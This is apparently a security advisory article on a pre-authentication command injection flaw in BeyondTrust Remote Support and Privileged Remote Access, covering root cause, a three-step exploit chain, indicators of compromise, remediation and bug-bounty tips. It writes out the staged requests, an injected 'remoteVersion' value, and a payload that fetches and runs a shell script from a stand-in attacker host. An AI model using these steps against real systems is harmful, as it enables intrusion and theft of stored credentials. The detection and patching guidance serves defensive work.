BeyondTrust Pre-Auth RCE (CVE-2026-1731): WebSocket OS Command Injection Hits 8,500+ Vulnerable Instances

Published: February 19, 2026 | Severity: Critical | CVSS Score: 9.9

Executive Summary

A critical pre-authentication remote code execution vulnerability has been discovered in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) — two widely deployed enterprise remote access platforms. Tracked as CVE-2026-1731 with a CVSS score of 9.9, this flaw requires no credentials, no user interaction, and is exploitable over the network alone. Attackers can achieve full OS-level command execution by injecting shell commands through a WebSocket endpoint before authenticating.

With an estimated 11,000 internet-exposed instances and 8,500+ confirmed vulnerable, CVE-2026-1731 is a mass-exploitation event in progress. A public proof-of-concept (PoC) dropped on February 6, 2026 — hours before in-the-wild exploitation began. Mass exploitation was confirmed by February 12. Post-compromise activity includes SimpleHelp RMM backdoor deployment and credential vault access, enabling lateral movement across enterprise networks.

If your organization runs BeyondTrust RS ≤ 25.3.1 or PRA ≤ 24.3.4 and the management interface is internet-accessible, assume you are at risk right now.

CVSS 9.9 Breakdown

CVE-2026-1731 earns a near-perfect CVSS score through the most dangerous combination of attack vector attributes:

Attack Vector (AV:N): Network — fully exploitable over the internet, no physical or local access required
Attack Complexity (AC:L): Low — a three-step WebSocket exchange, scriptable in under 50 lines of Python
Privileges Required (PR:N): None — zero authentication, zero credentials, no session token needed
User Interaction (UI:N): None — fully automated exploitation, no victim interaction
Scope (S:C): Changed — arbitrary OS commands run in the context of the BeyondTrust service account, which typically holds elevated privileges on the host
Confidentiality (C:H): High — complete access to the credential vault, session recordings, and privileged access keys
Integrity (I:H): High — full ability to modify system configuration, implant backdoors, or tamper with access policies
Availability (A:H): High — service disruption or complete system takeover possible

The one-tenth deduction from a perfect 10.0 reflects minor environmental factors — in practice, this vulnerability should be treated with the same urgency as a CVSS 10.0. BeyondTrust platforms are privileged access chokepoints: compromising one means compromising everything it touches.

Technical Analysis: The Attack Chain

Root Cause: Unsanitized Parameter in Bash Numeric Comparison

The vulnerability originates in BeyondTrust's remote session negotiation logic. During a WebSocket-based session handshake, the server extracts a remoteVersion parameter from the incoming WebSocket message and passes it to a Bash script performing a numeric version comparison:

if [[ "$remoteVersion" -gt "$localVersion" ]]; then
    # upgrade path
fi

The remoteVersion value is never validated or sanitized before being interpolated into this expression. In Bash, the -gt numeric comparison inside [[ ]] will trigger command substitution if the variable contains backtick or $() syntax. An attacker supplies a value like 1$(curl${IFS}http://attacker.com/shell.sh|bash) and the shell executes the injected payload during comparison evaluation. This is a textbook CWE-78 (Improper Neutralization of Special Elements used in an OS Command) in a server-side context with no authentication gate in front of the WebSocket endpoint.

Stage 1: Enumerate the Company Identifier

Exploitation begins with a single unauthenticated HTTP request:

GET /get_portal_info HTTP/1.1
Host: target.beyondtrustcloud.com

The JSON response includes configuration metadata, including the x-ns-company field — a tenant identifier used by the WebSocket endpoint to route sessions. This value is required for Stage 2 and is freely disclosed without any authentication.

{
  "x-ns-company": "acmecorp",
  "portal_version": "25.2.1",
  ...
}

Stage 2: Establish the Unauthenticated WebSocket Connection

Using the extracted company value, the attacker initiates a WebSocket upgrade to the /nw endpoint:

GET /nw?company=acmecorp HTTP/1.1
Host: target.beyondtrustcloud.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13

The server accepts this connection without requiring any authentication token. The /nw endpoint is intended for the initial phase of remote session negotiation — a phase that was never gated behind authentication, on the assumption that the connection would only come from BeyondTrust client software. This assumption is the design flaw that makes exploitation trivial.

Stage 3: Inject OS Commands via `remoteVersion`

With the WebSocket open, the attacker sends a crafted session negotiation message:

{
  "type": "session_negotiate",
  "remoteVersion": "1$(id>/tmp/pwned)",
  "clientType": "support_client"
}

The server-side Bash script receives remoteVersion=1$(id>/tmp/pwned), evaluates it inside the numeric comparison, and the command substitution fires — writing the output of id to /tmp/pwned under the BeyondTrust service account. Replace id>/tmp/pwned with a reverse shell, a wget/curl dropper, or a persistence mechanism and you have full pre-auth RCE. Observed payloads in active exploitation include:

Download and execute SimpleHelp RMM agent for persistent C2 access
Dump the BeyondTrust credential vault database
Create rogue local administrator accounts
Deploy web shells into the BeyondTrust web root

Why This Works Without Authentication

BeyondTrust's architecture exposes the /nw WebSocket endpoint on the same public-facing HTTPS port as the administrative interface. The design rationale is that support clients need to connect before authenticating via the portal UI. The security boundary was supposed to be enforced downstream in the session setup logic — but the command injection fires in the initial negotiation phase, well before any authentication check is reached. This is a classic security layer ordering failure: dangerous operations (shell execution) occurring before the identity verification step.

Scope and Scale: Who Is Exposed

BeyondTrust Remote Support and Privileged Remote Access are enterprise-grade platforms deployed by Fortune 500 companies, government agencies, financial institutions, and managed service providers. They are commonly deployed in highly privileged positions:

IT help desk infrastructure: All inbound support sessions route through RS/PRA instances
PAM (Privileged Access Management): PRA is a Gartner-recognized PAM solution, storing passwords and SSH keys for critical infrastructure
Jump server replacements: Organizations use RS/PRA as the single gateway for all privileged RDP/SSH access
MSP tooling: Managed service providers use RS to access hundreds of customer networks from a single deployment

Exposure Numbers (as of Feb 19, 2026)

~11,000 internet-exposed instances identified via Shodan/Censys
8,500+ confirmed running vulnerable versions (RS ≤ 25.3.1 or PRA ≤ 24.3.4)
< 48 hours between PoC publication and confirmed in-the-wild exploitation
Feb 12: Mass exploitation wave confirmed by Arctic Wolf, Orca Security, and SentinelOne

Affected Versions

BeyondTrust Remote Support (RS): All versions ≤ 25.3.1
BeyondTrust Privileged Remote Access (PRA): All versions ≤ 24.3.4
Fixed versions: RS 25.3.2+, PRA 25.1.1+ (Advisory BT26-02, released February 6, 2026)

Detection and Indicators of Compromise

If you have not yet patched, hunt for these indicators immediately. If you have patched, hunt for them anyway — mass exploitation began two weeks ago.

Network-Level IoCs

WebSocket upgrade requests (GET /nw?company=*) from external IP ranges — especially from scanning infrastructure (Shodan crawlers, GreyNoise mass-scanners, known VPN exits)
WebSocket connections to /nw that do not originate from your known support client IP ranges
Anomalous outbound connections from the BeyondTrust server process to external IPs on uncommon ports (4444, 8080, 9001 — common reverse shell ports)
DNS queries originating from the BeyondTrust host for unknown or newly registered domains
Outbound HTTP/S to SimpleHelp update servers or distribution CDNs (SimpleHelp RMM is the observed post-exploitation backdoor)

Host-Level IoCs

Child processes spawned from the BeyondTrust site/service user (www-data, btss, or equivalent): curl, wget, bash, sh, python — these should never spawn from the BeyondTrust process tree
SimpleHelp binaries present in C:\ProgramData\ or /tmp/, /var/tmp/, /dev/shm/
New local administrator accounts or SSH authorized_keys modifications post-dating your last known-good configuration
Web shell files in the BeyondTrust web root (check for .php, .jsp, .aspx files with recent creation dates)
Unusual reads of the BeyondTrust credential vault database files (*.db, *.sqlite)

Log Sources to Examine

BeyondTrust access logs: Filter for /nw WebSocket upgrades and /get_portal_info requests from external IPs
OS process creation logs (Windows Event ID 4688 / Sysmon Event ID 1): Parent process = BeyondTrust service, child = shell binary
EDR telemetry: Command injection payloads often leave forensic artifacts in process command-line arguments even if the attacker attempts to clean up

Testing Your Own Instance

For authorized security testing of your BeyondTrust deployment, Burp Suite Professional is the standard tool for intercepting WebSocket frames, replaying modified messages, and validating whether your patched instance correctly rejects injected remoteVersion values. Use Burp's WebSocket history and Repeater to craft test payloads against a controlled lab instance before verifying your production fix. The Active Scan extension can automate detection of command injection patterns in WebSocket message parameters.

Remediation: Patch, Restrict, Detect

Priority 1: Patch Immediately (Critical)

Apply BeyondTrust Advisory BT26-02:

Remote Support: Upgrade to RS 25.3.2 or later
Privileged Remote Access: Upgrade to PRA 25.1.1 or later

BeyondTrust cloud-hosted instances (BeyondTrust.com SaaS) were patched automatically on February 6, 2026. Self-hosted deployments require manual upgrade. Verify your patch status in the BeyondTrust appliance admin console under Management → Software → Version.

Priority 2: Network-Level Mitigations (If Immediate Patching Is Not Possible)

IP allowlist: Restrict access to the BeyondTrust management interface to known corporate IP ranges via perimeter firewall or the appliance's built-in IP restriction feature. The /nw endpoint must not be reachable from arbitrary internet IPs.
VPN gate: Place the BeyondTrust instance behind a VPN concentrator and require VPN authentication before any connection reaches the appliance
WAF rule: Deploy a Web Application Firewall rule to block WebSocket upgrade requests to /nw from unauthenticated external sources. AWS WAF, Cloudflare WAF, and F5 BIG-IP all support WebSocket protocol inspection. Block or challenge requests matching: GET /nw?company=* from non-allowlisted sources.

Priority 3: Assume-Breach Response

Given that mass exploitation began February 12 and many organizations have not yet patched, treat any unpatched (or recently patched but unaudited) instance as potentially compromised:

Rotate all credentials stored in the BeyondTrust vault — SSH keys, RDP passwords, API keys
Revoke and reissue all active BeyondTrust sessions
Hunt for SimpleHelp RMM deployments across systems the BeyondTrust service account had access to
Review Windows Event 4688 / Sysmon Event 1 logs on the BeyondTrust host for the February 6–19 window
Engage your IR team or a managed detection and response (MDR) provider for forensic triage if suspicious indicators are found

Long-Term Hardening

Never expose BeyondTrust administrative interfaces directly to the internet without VPN or zero-trust network access (ZTNA)
Implement least-privilege service accounts for BeyondTrust processes — limit the OS commands available to the service user
Enable BeyondTrust's audit logging to SIEM for real-time alerting on anomalous WebSocket patterns
Subscribe to BeyondTrust security advisories and establish a patching SLA for CVSS ≥ 9.0: patch within 24-48 hours

Post-Exploitation: What Attackers Do Next

Observed and anticipated post-exploitation activity following CVE-2026-1731 exploitation:

SimpleHelp RMM Backdoor

The primary persistence mechanism observed in the wild is the deployment of SimpleHelp, a legitimate remote monitoring and management (RMM) tool. Attackers abuse legitimate RMM software because it blends into enterprise environments, bypasses many EDR behavioral rules, and provides persistent, encrypted C2 channels without requiring custom malware. Look for SimpleHelp.exe, simplehelp.jar, or installation directories under C:\ProgramData\SimpleHelp\.

Credential Vault Pillaging

BeyondTrust PRA's primary value proposition — and the attacker's primary target — is its credential vault. Post-exploitation, attackers extract stored credentials enabling:

Direct RDP/SSH access to all managed endpoints without triggering BeyondTrust session controls
Lateral movement to critical infrastructure: domain controllers, core switches, hypervisors
Privilege escalation via stored domain administrator credentials
Exfiltration of secrets before the organization detects the breach and rotates credentials

BeyondTrust is a PAM solution — if the PAM is compromised, the attacker effectively has the keys to your entire privileged infrastructure.

Persistence via Web Shell and Rogue Accounts

Secondary persistence mechanisms observed include web shell deployment and creation of rogue local or domain accounts with BeyondTrust administrative privileges, ensuring continued access even if the original WebSocket injection vector is patched.

Essential Resources for Bug Hunters and Security Researchers

CVE-2026-1731 is a masterclass in several core vulnerability classes that every bug bounty hunter should deeply understand: WebSocket security, OS command injection, and pre-authentication attack surfaces. These resources will sharpen your ability to find — and responsibly disclose — similar issues:

Burp Suite Professional — The industry-standard web application security testing platform. For this vulnerability class specifically, Burp's WebSocket Repeater, Active Scan, and custom insertion point features are invaluable for probing command injection in WebSocket parameters. Essential for any researcher targeting enterprise remote access products.
The Web Application Hacker's Handbook (2nd Edition) — The definitive reference for web vulnerability research. Covers OS command injection (CWE-78), WebSocket security testing, authentication bypass, and the full spectrum of server-side attack techniques that underpin CVE-2026-1731. Required reading for anyone pursuing critical-severity web vulnerabilities.
The Hardware Hacking Handbook — When software vulnerabilities like CVE-2026-1731 give you OS-level access to appliance-based products (BeyondTrust RS runs on physical or virtual appliances), hardware hacking skills become directly relevant. Covers firmware extraction, UART/JTAG debugging, and appliance reverse engineering — critical skills for full-depth vulnerability research on remote access appliances.
The Hacker Playbook 3 — Practical red team methodologies covering lateral movement, credential theft from PAM solutions, and persistence via RMM tools — exactly the post-exploitation chain observed in CVE-2026-1731 wild exploitation.

Disclosure and Exploitation Timeline

February 6, 2026: BeyondTrust publishes Advisory BT26-02 and releases RS 25.3.2 / PRA 25.1.1 patches
February 6, 2026: Public proof-of-concept exploit published within hours of advisory release
February 6–7, 2026: First in-the-wild exploitation detected — SimpleHelp RMM backdoor deployments reported by Arctic Wolf and Orca Security
February 12, 2026: Mass exploitation wave confirmed; SentinelOne and SecurityAffairs report widespread automated scanning and exploitation
February 19, 2026: 8,500+ vulnerable instances remain unpatched; exploitation ongoing

The speed of exploitation — PoC to active mass-exploitation in under a week — reflects the extreme value of BeyondTrust targets and the ease of exploitation (three HTTP/WebSocket steps, no authentication). Organizations that have not patched by now have almost certainly already been scanned; many have been compromised.

Bug Bounty Perspective: What to Look For

CVE-2026-1731 illustrates a repeatable vulnerability pattern in enterprise remote access products. If you're hunting in this space, focus on:

Pre-authentication WebSocket endpoints: Enumerate all WebSocket upgrade paths before authentication gates. Test every parameter for command injection, SSRF, and deserialization using Burp's WebSocket tooling.
Version negotiation protocols: Any server-side logic that compares client-supplied version strings against Bash numeric operators is a prime injection target. Look for shell scripts that process user-supplied values.
Configuration discovery endpoints: /get_portal_info-style endpoints that disclose tenant identifiers, version strings, or internal paths often form the reconnaissance phase of a multi-step exploit chain.
Appliance-based products: Remote access appliances (BeyondTrust, Pulse Secure, Citrix Gateway, Fortinet) have historically high densities of pre-auth RCE vulnerabilities. Their complexity, long patch cycles, and privileged network positions make them extremely high-value targets for both attackers and bug bounty hunters.

For deep-dive research into remote access appliance internals, The Hardware Hacking Handbook provides the firmware extraction and embedded Linux analysis techniques needed to audit these systems at the binary level — often revealing vulnerabilities that black-box testing misses.

Conclusion: A Textbook PAM Nightmare

CVE-2026-1731 is a textbook example of why privileged access management platforms are among the highest-value targets in enterprise security. A single pre-authentication flaw in a WebSocket parameter handler gives attackers OS-level code execution on a platform that holds the keys to your entire privileged infrastructure — domain admin credentials, SSH keys, RDP passwords for every managed endpoint.

The exploitation timeline is unforgiving: PoC on February 6, mass exploitation by February 12, and over 8,500 vulnerable instances still exposed as of today. This is not a theoretical risk — it is an active, ongoing compromise event for organizations that have not acted.

Immediate Action Checklist:

✅ Patch RS to 25.3.2+ or PRA to 25.1.1+ today — no exceptions
✅ If patching is impossible right now: restrict /nw WebSocket access via WAF or IP allowlist immediately
✅ Hunt for SimpleHelp binaries and unexpected child processes from the BeyondTrust service account
✅ Rotate all credentials stored in the BeyondTrust vault — treat them as compromised
✅ Review process creation logs (Windows Event 4688 / Sysmon Event 1) for the February 6–19 window
✅ Never expose BeyondTrust administrative interfaces directly to the internet — VPN or ZTNA only

For security researchers: CVE-2026-1731 is a reminder that the most critical vulnerabilities are often simple. Three HTTP/WebSocket steps, one unsanitized variable, and an architecture that trusted its own negotiation endpoints — that's all it takes to compromise 8,500+ enterprise environments. The complexity isn't in the exploit; it's in finding that one unsanitized parameter in a sea of enterprise software.